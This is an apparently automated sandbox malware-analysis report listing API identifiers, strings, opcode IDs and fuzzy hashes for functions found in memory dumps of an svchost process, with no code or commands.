                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction ID: 1ea180a3ee2262d5b39dc0e59307bc296c961544739bfa2745ee1b5ceb63738c
                                                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction Fuzzy Hash: 5E316D23701B5596FB559F56A84CB6EA3B4FB48B84F4C81309F8C07B94EB3AC4E68700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction ID: c43607713e0c6c97de88d4599fd6e21686f2b8541ef43f0528a5712d67e523be
                                                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction Fuzzy Hash: CC0139A1300E85A6FA10DB12B45CB5D63A1F788BC8F488035DE8943764DE38CDC9C780
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction ID: 42dfebf875f34975a9fa49ed8bfad59ee60360c0cf16d61123f10a73831e6615
                                                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction Fuzzy Hash: 0B011722300A4196FA14DB12A85CB5E63A1F788FC0F888435DE9D437A4DE3AC9CA8740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                • Instruction ID: e73f8db2c153ffa6031ac89e7f47abedd1671e92df6b6f1fa4f65608afc3760e
                                                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                • Instruction Fuzzy Hash: 5A112DA5611F84A6FB24DB21F41DB1E67A1BB59B99F041425ED4D07754EF3CC88CC780
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                • Instruction ID: f485ff3e4baa52ab63d0acf1b7668142c5959c1ce7657c0646b07aa145ef2967
                                                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                • Instruction Fuzzy Hash: EC11D376611B4086FB649B21E81DB5FA6B0FB58B85F480529CA4D477A4EF3EC48A8704
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                • Instruction ID: 1db837e3bce2590824ac6d02754b868d19747311b289bbf7175b89a1733955d5
                                                                                • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                • Instruction Fuzzy Hash: 41517AB2A12A81AAFB14CB19F44DF5D3795F344BACF51A130AE1A47788DE35DC89C780
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction ID: 480cc832c1dd2d74a245fc86fa39619ec9e8f0e8a8f51f7316ad2ea3ac9ab8ea
                                                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction Fuzzy Hash: C7517433A126008EFB58EB25E44CF5D37A6F785B98F5181349A1A47788EA36DC82CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction ID: 6029a32a3b131775ca9aa2de57ca304d9106b6e62fc2de667049427c815bb794
                                                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction Fuzzy Hash: 0B314733210750AAFB14DF22E88CB5E37B5F748B88F558524AE5E47799DB3AC982C704
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                • Instruction ID: c14c9e598b19ae5d458121146bb1c13a5259c6842c78e5386836c35fdb18f2fc
                                                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                • Instruction Fuzzy Hash: F9F03CA2304A85A2FB60CB25F49CB5E6761F754B8CF84A031DA4946964DF6CCECCCB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                • Instruction ID: e34da4fc295446cb93736cb72a4ac36724dd23593545b0a30eb7164c410b6ec5
                                                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                • Instruction Fuzzy Hash: F4F04463304A4192FB709B21F49DB5F6770F748B88F889030CA4D465A4DE7EC6CAC700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction ID: 2ee967b6827f685580f1867f30c20937cd0c8086198eccc4d6f7fc78e6914594
                                                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction Fuzzy Hash: 2CF05EA0704FC4A1FA00CB13B91C61DA661BB88FD8F08A131EE5A47B28CE28CCC98740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction ID: a83c48e8d88e8c03fbb609af74db44490d03467e99848ded5f5b1cf1603f6fae
                                                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction Fuzzy Hash: 48F08222304B8091FA009B13B95D61FA230EB8CFD0F4C8131DE5E4BBA8CE2DC4C28300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction ID: bef00bcb462ea8d391f71e87db78ad93bfde47d33a96bbcc5e5c6947ee629fa7
                                                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction Fuzzy Hash: 96F0DAA1711F88A2FF58CB60F88CB6D2360FB98B98F443029A50B45565DE28C8CCC780
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction ID: be63d93167989de38ed4729333681a73d350b129477774fad9e545089f018a49
                                                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction Fuzzy Hash: 6FF0126371174491FF945B60E89CB6F2374EB8CB90F482029991F455A4DF3AC5CAC710
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                • Instruction ID: b90d4c69e50f11a534a51cc10133cdb39f6fc15811da4279f7f99f6003cd9a59
                                                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                • Instruction Fuzzy Hash: B102B772219BC496E760CB55F49C75EB7A0F384788F505125EA8E87BA9DF7CC888CB40
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                • Instruction ID: 1639f54d1a2db31597ab061571d91a728a79d2649a59436871a533dcce9696dc
                                                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                • Instruction Fuzzy Hash: 8802A537219B8486E7A0CB59E49C75EB7B0F3C8794F104125EA8E87BA8DB7DC495CB01
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 2210144848-0
                                                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                • Instruction ID: ce0290b6db2e6ee72a3fa482e25c63a1a0fc021221276da1183f7416593dbbc0
                                                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                • Instruction Fuzzy Hash: 9581E5A2610F98A9FB54DF61A98CBAD67A0F748B9CF442115DE0A53792DF34CCC9C390
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 2210144848-0
                                                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                • Instruction ID: 369862b865f485540b14611f5bae7f60014c65c826d1c2498f7e1c78993b8d8e
                                                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                • Instruction Fuzzy Hash: 87818D23710A5489FB50AB65D88CBAF66B1F75CBD8F444216EE0EA7692DB3684C3C710
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                                • Instruction ID: 31977e04e21dfdcf7141a31ff40d1d7e711db1dd2b56a2050cc226599f3ff4d2
                                                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                                • Instruction Fuzzy Hash: 6261CDB6619E94D6F760CB15F44C71E77A0F388748F506125EA8E43BA4CB7CC984CB80
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                                • Instruction ID: 3900f3059c738225f6a5fa85eb6fb975c0c954b7180fbb75279ffa4281695522
                                                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                                • Instruction Fuzzy Hash: 30619537619A40C6F660DB15E49CB1EB7B0F388B94F500125FA8D47BA8DB7AC5918F01
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2678865250.000002C9AFB80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFB80000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afb80000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction ID: d818f852ad0d94a2d1d75cbb439bd8fdbfa48d6e876fce20739df24100a7b2b2
                                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction Fuzzy Hash: B811A923A5CE0112FA642275E5DEB7D30716B55374F484629AA7F16BF68B2A8CC26100
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction ID: f196f5ed6ba1ea877bfe2618c6159774e885ff479544362140b7b07de737a2f8
                                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction Fuzzy Hash: 2D11C6B2A54FCC29FAA89168F55EB6D50407B6437CF082674BE7686BF68F188CCD4180
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction ID: 38f7e1978cb016fdada063fc0ed106d72821edb380f9c7efd89232f2566a42ed
                                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction Fuzzy Hash: 8311CC23A54A1142F7985164E49EB6F10717F6E374F444634FA7F367F68B568CC39110
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1452528299-0
                                                                                • Opcode ID: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
                                                                                • Instruction ID: 06c188d41736c0ee36ca8f11025a9626d3cda27a5ee3e0f90fd7c785db233fb1
                                                                                • Opcode Fuzzy Hash: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
                                                                                • Instruction Fuzzy Hash: BC1142E0211EC462FE54D729B84DF1D2395B7487B8F146634D926077D5DE2CDCCAC680
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID:
                                                                                • API String ID: 1092925422-0
                                                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction ID: ebae5d6b033c2d3c81e8c42231290614dbd24878567faaa549f479a2a74637d1
                                                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction Fuzzy Hash: AB112A6A704F8492FB14DB11F40CB6EA6A0F789B88F041039EE8907794EE3DC988C740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID:
                                                                                • API String ID: 1092925422-0
                                                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction ID: 7c1077f289e9fe3bdad664426f5ef8321a411fd66ba1491de2762dda9ca6b00b
                                                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction Fuzzy Hash: 7211F72B705B4186FB549B21F84CBAE66B4FB88B84F494039DE8D07794EE3EC589C704
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2678865250.000002C9AFB80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFB80000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afb80000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction ID: 58bbeb18a011c253736ef621836d1cf4ee9f6a422d9b84fdefbc0d91292fa91d
                                                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction Fuzzy Hash: 8A5184336126008BFB28DF25E88CF6D37B5F384B98F518124DA1E47788EB36D9818784
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U$ec
                                                                                • API String ID: 442123175-660619397
                                                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction ID: 5405106f66eea1edc96533808c50d55114c38088c5d7d8d608e4c02f9a47cae2
                                                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction Fuzzy Hash: FD41A4B2614E8491EB20DF25F84C79DA7A4F398B98F405125EE4D87754DF3CC995CB80
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2678865250.000002C9AFB80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFB80000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afb80000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction ID: ddbd828c01473e696428a1b25e579e1d2d5dc67caa4f7240124a9e3257c085b0
                                                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction Fuzzy Hash: 573147772116409BF714DF22E88CBAD37B4F780B98F158124AE5E07789DB3AC981C788
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                • Instruction ID: 4157b3932650a9c2520fbb33bb3fefd9e3877b61ed9d531ab6480a83bb933ac3
                                                                                • Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                • Instruction Fuzzy Hash: F9111832514B889AFB549F66A84C65F7370F789F84F484029EB8E03764DF39C4928740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CodeInfoPageValid
                                                                                • String ID: ec
                                                                                • API String ID: 546120528-2323562846
                                                                                • Opcode ID: 35d6533b1720f8da579d8e82cf18d97fc9af59e992c0e4d0a17b5eb86b4e7be8
                                                                                • Instruction ID: fbeb27188459d1e4cacef938b7f874e68e522ed59dde181cc182eafb05bbc104
                                                                                • Opcode Fuzzy Hash: 35d6533b1720f8da579d8e82cf18d97fc9af59e992c0e4d0a17b5eb86b4e7be8
                                                                                • Instruction Fuzzy Hash: 5F81E5E2604AC4A6FB65CF25B44CB6D7A91F3447C8F686136CA8A47790DA38DDC9C380
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
